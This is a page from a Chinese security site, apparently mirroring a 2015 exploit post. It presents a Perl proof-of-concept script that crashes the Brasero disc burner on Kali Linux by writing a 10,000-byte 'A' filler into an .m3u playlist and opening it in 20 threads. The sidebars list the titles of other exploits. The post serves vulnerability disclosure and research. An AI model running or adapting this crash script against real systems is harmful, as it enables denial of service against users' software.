首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Brasero - Crash Proof Of Concept
来源:www.reza.es 作者:Espargham 发布时间:2015-08-10  
#!/usr/bin/perl -w
# Title : Kali (brasero) - Crash Proof Of Concept
# website : https://www.kali.org/downloads/
# Tested : kali 1.x
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#
#
 
#Demo : http://youtu.be/XMu5ZXupbOI
 
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 
 
$path="/tmp/r3z4.m3u";
my $PoC = "\x41" x 10000 ;
open(crash , ">", $path);
print crash $PoC;
close(crash);
 
 
use threads;
 
 
sub check_app {   #thread sub
    system("brasero $path");
    return 0;
}
 
my @threads;
for (my $i = 0; $i < 20; $i++) {
    my $thread = threads->create(\&check_app);
    push(@threads, $thread);
}
foreach (@threads) { #join
    $_->join();
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Acunetix Web Vulnerability Sca
·Classic FTP 2.36 - CWD Reconne
·Heroes Of Might And Magic III
·MS14-002 Windows NDProxy Privi
·BIND TKEY Query Denial Of Serv
·FileZilla Client 2.2.x SEH Buf
·Dell Netvault Backup 10.0.1.24
·Linux/x86 Memory Sinkhole Proo
·ISC BIND9 TKEY Remote DoS PoC
·Tomabo MP4 Player 3.11.3 SEH B
·Linux Privilege Escalation Due
·PHP SPL ArrayObject Use-After-
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved